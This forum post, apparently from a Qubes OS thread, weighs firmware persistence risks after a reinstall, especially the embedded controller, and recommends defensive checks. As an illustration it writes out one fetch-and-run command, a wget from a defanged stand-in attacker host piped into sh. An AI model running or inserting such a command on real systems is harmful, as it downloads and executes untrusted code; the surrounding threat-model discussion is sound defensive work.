Thanks @fsflover that is indeed mostly the model i use. I personally discounted Wifi as the vast majority of machine I use dont have it, but I did mention network option roms earlier. I guess the update would be, to anyone with a wifi adapter on scorched earth hardware, swap it out to be sure.
This leaves SPI (BIOS), HDD and EC. Ive touched on BIOS and HDD already. So that leaves EC.
Now the EC is a processor on the SPI bus, and I do agree with Joannas work. However, what can it do practically? Joanna coves that here. If the EC isnt using firmware thats on the BIOS ROM (as the BIOS is flushed to stock on scorched earth), then there is a risk of something being there. Thats when it may be prudent to have a before vs after byte comparison of the EC firmware. But again, this would depend on the firmware not being in the BIOS SPI chip and being on a separate chip, and it would be of very limited use as a persistence vector (read: the persistence would need to know when - eg, sniffing the screen (already called out by Joanna as “questionable in practice”) for a specific situation such as terminal being open - to type out a set of pre defined keystrokes that hopefully the operator does not see appearing on their screen (lets say wget -O /tmp/1 hXXps://bad.actor/malware && sh /tmp/1 ). It just seems to me like a verry highly improbable set of persistence circumstances. To incorporate that into a threat model, I would say check the EC chip tech spec, make sure it has no onboard flash space and then check for all other SPI flash chips on your board.
however, we are again veering way off course from QubesOS and re-installing a compromised Dom0 from repos - I suspect @deeplow will be along soon, so I shall end my input to this particular tangent here.